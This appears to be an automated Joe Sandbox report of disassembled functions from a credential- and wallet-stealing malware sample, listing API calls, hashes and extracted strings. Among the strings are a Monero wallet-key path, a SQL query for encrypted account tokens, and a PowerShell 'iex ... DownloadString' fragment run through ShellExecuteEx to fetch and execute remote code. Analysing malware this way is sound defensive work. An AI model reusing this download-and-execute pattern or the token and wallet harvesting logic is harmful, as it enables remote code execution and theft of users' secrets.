                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 91b6ac3a435d1193e4629993affeea9617ae97c3033c550f512c4a5ac8f492fd
                              • Instruction ID: 05dd69e0d1458c61413453358154c1826963960248fe9f789955a2c7eac81213
                              • Opcode Fuzzy Hash: 91b6ac3a435d1193e4629993affeea9617ae97c3033c550f512c4a5ac8f492fd
                              • Instruction Fuzzy Hash: C0612BB5D0416C9BEB24DB54CC85BD9B7B8FF49300F0081E9E689A6541EB706BC9CFA1
                              Function 008ABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              • lstrlen.KERNEL32(00000000), ref: 008ABC9F
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 008ABCCD
                              • lstrlen.KERNEL32(00000000), ref: 008ABDA5
                              • lstrlen.KERNEL32(00000000), ref: 008ABDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 5b03e7509f96d073cee0456ba278b82adfa7f75d4a2d9cdbcda11e5fc1672585
                              • Instruction ID: 287823a35e116593494cc5ef109b88cbcb4249541353edacfb974a991a976a8f
                              • Opcode Fuzzy Hash: 5b03e7509f96d073cee0456ba278b82adfa7f75d4a2d9cdbcda11e5fc1672585
                              • Instruction Fuzzy Hash: 03B11F71910108ABDF18EBA4DD96EEE7738FF54300F404168F506E66A2EF346A49CB63
                              Function 008B6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 5f880880dba1410df44d1344697dc5174ef1199599e2adcbb0f60362dee0d224
                              • Instruction ID: 405a1ea71c04560ecf7f4b9653e8cc2a8ef9d7cc58df7186c07f44dae6195b93
                              • Opcode Fuzzy Hash: 5f880880dba1410df44d1344697dc5174ef1199599e2adcbb0f60362dee0d224
                              • Instruction Fuzzy Hash: F6F08275904289EFD344DFE0E94976C7B70FB14703F040298F609CA390EA746B52DB96
                              Function 008A4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008A4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A4FD1
                              • InternetOpenA.WININET(008C0DDF,00000000,00000000,00000000,00000000), ref: 008A4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 008A5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 008A5041
                              • InternetCloseHandle.WININET(?), ref: 008A50B9
                              • InternetCloseHandle.WININET(?), ref: 008A50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 2b34c8a1efe39af4a3c1893976d3fd432c1ffaf8bf180ac99c01d3e9992b668e
                              • Instruction ID: dd8cca0e6b7324769e3ae3ef8c7454f97c422684383987ec453efdcd2cae2765
                              • Opcode Fuzzy Hash: 2b34c8a1efe39af4a3c1893976d3fd432c1ffaf8bf180ac99c01d3e9992b668e
                              • Instruction Fuzzy Hash: DD31E4B4A0021CABDB20CF94DC85BDDB7B4FB48704F1081D9EB09A7281D7706AC68F99
                              Function 008B83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008B8426
                              • wsprintfA.USER32 ref: 008B8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008B847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B8499
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0142E698,00000000,000F003F,?,00000400), ref: 008B84EC
                              • lstrlen.KERNEL32(?), ref: 008B8501
                              • RegQueryValueExA.ADVAPI32(00000000,0142E920,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,008C0B34), ref: 008B8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 7b1e29486427b69a4ff2e20a4209a56c9afd37853c2542f01da32e92a9ad906b
                              • Instruction ID: abcbfb403e0a8d1b0803ad4c0d1c2c3cbbf3130962cf1a230686410de17121c4
                              • Opcode Fuzzy Hash: 7b1e29486427b69a4ff2e20a4209a56c9afd37853c2542f01da32e92a9ad906b
                              • Instruction Fuzzy Hash: A221E97191021CABDB24DB54DC85FE9B7B8FB58700F00C5D8E609A6240DF71AA86CFE5
                              Function 008B7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0141B660,00000000,00020119,00000000), ref: 008B76DD
                              • RegQueryValueExA.ADVAPI32(00000000,0142E770,00000000,00000000,?,000000FF), ref: 008B76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 49f7af07d16917a5a946530f5c37dca0f205afa27cd58c79546bbf06c259cffe
                              • Instruction ID: 7f989ded5c41464f380e95074e4045e381b59ff07f7397447e47c5bab92314bd
                              • Opcode Fuzzy Hash: 49f7af07d16917a5a946530f5c37dca0f205afa27cd58c79546bbf06c259cffe
                              • Instruction Fuzzy Hash: 220162B5A04308BFD700DBE4DC89FAEBBB8EB58701F108054FA05DB290DA70A9058B52
                              Function 008B7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0141B660,00000000,00020119,008B76B9), ref: 008B775B
                              • RegQueryValueExA.ADVAPI32(008B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 008B777A
                              • RegCloseKey.ADVAPI32(008B76B9), ref: 008B7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 48d7662301350648c9d96c39ffac682af427b92614a297f81ee6c3cc381996ce
                              • Instruction ID: 3ae40b03bedafe3b6bbdd5078fd96edde2748a99a1336ea20c72c76f6dfa8e44
                              • Opcode Fuzzy Hash: 48d7662301350648c9d96c39ffac682af427b92614a297f81ee6c3cc381996ce
                              • Instruction Fuzzy Hash: F00144B5A40308BBEB10DBE4DC89FAEB7B8EB54700F004158FA05EB281DA7065018F52
                              Function 008A99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                              • LocalFree.KERNEL32(008A148F), ref: 008A9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 59cbec864432b68ff56d7420c8dd4d11fdea1a477c176f6665d66a742bc2f005
                              • Instruction ID: 375c1f578cd3df547e22daf46ac5248313b7b277c2cda8625bbe3bc6a3662dd8
                              • Opcode Fuzzy Hash: 59cbec864432b68ff56d7420c8dd4d11fdea1a477c176f6665d66a742bc2f005
                              • Instruction Fuzzy Hash: 1B3129B4A00209EFEF14CF94C885BAE77B5FF49350F108159E916EB690D774AA41CFA1
                              Function 008B4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0142EB90), ref: 008B47DB
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4801
                              • lstrcat.KERNEL32(?,?), ref: 008B4820
                              • lstrcat.KERNEL32(?,?), ref: 008B4834
                              • lstrcat.KERNEL32(?,0141B078), ref: 008B4847
                              • lstrcat.KERNEL32(?,?), ref: 008B485B
                              • lstrcat.KERNEL32(?,0142CE90), ref: 008B486F
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008B8D90: GetFileAttributesA.KERNEL32(00000000,?,008A1B54,?,?,008C564C,?,?,008C0E1F), ref: 008B8D9F
                                • Part of subcall function 008B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008B4580
                                • Part of subcall function 008B4570: RtlAllocateHeap.NTDLL(00000000), ref: 008B4587
                                • Part of subcall function 008B4570: wsprintfA.USER32 ref: 008B45A6
                                • Part of subcall function 008B4570: FindFirstFileA.KERNEL32(?,?), ref: 008B45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 54eeed5891c768d13bba6c93ca638a5cde7a592558f28e5a061546d1f3312eb5
                              • Instruction ID: cfb652fd061d1377cbe46f506c3658943d9728902605a2afde9d4d5af70b1d48
                              • Opcode Fuzzy Hash: 54eeed5891c768d13bba6c93ca638a5cde7a592558f28e5a061546d1f3312eb5
                              • Instruction Fuzzy Hash: 0E31AFB2900208A7DB14FBB4DCC6EE9777CFB58700F404589B319D6181EE70A78ACB92
                              Function 008B2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B2D85
                              Strings
                              • ')", xrefs: 008B2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 008B2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 008B2D04
                              • <, xrefs: 008B2D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 7719d123fe84ff9bdc5059dde25064bda49899e22fdadcd0318c9c010f2e9c9d
                              • Instruction ID: a431b16a2c594c0149f114dfe0b429c23ca093454eda68c0d2088a44e536e6c6
                              • Opcode Fuzzy Hash: 7719d123fe84ff9bdc5059dde25064bda49899e22fdadcd0318c9c010f2e9c9d
                              • Instruction Fuzzy Hash: DF41AD71810208AADB18EBA4C8A1FDDBB74FF14700F404129E116EA291DF746A4ACF92
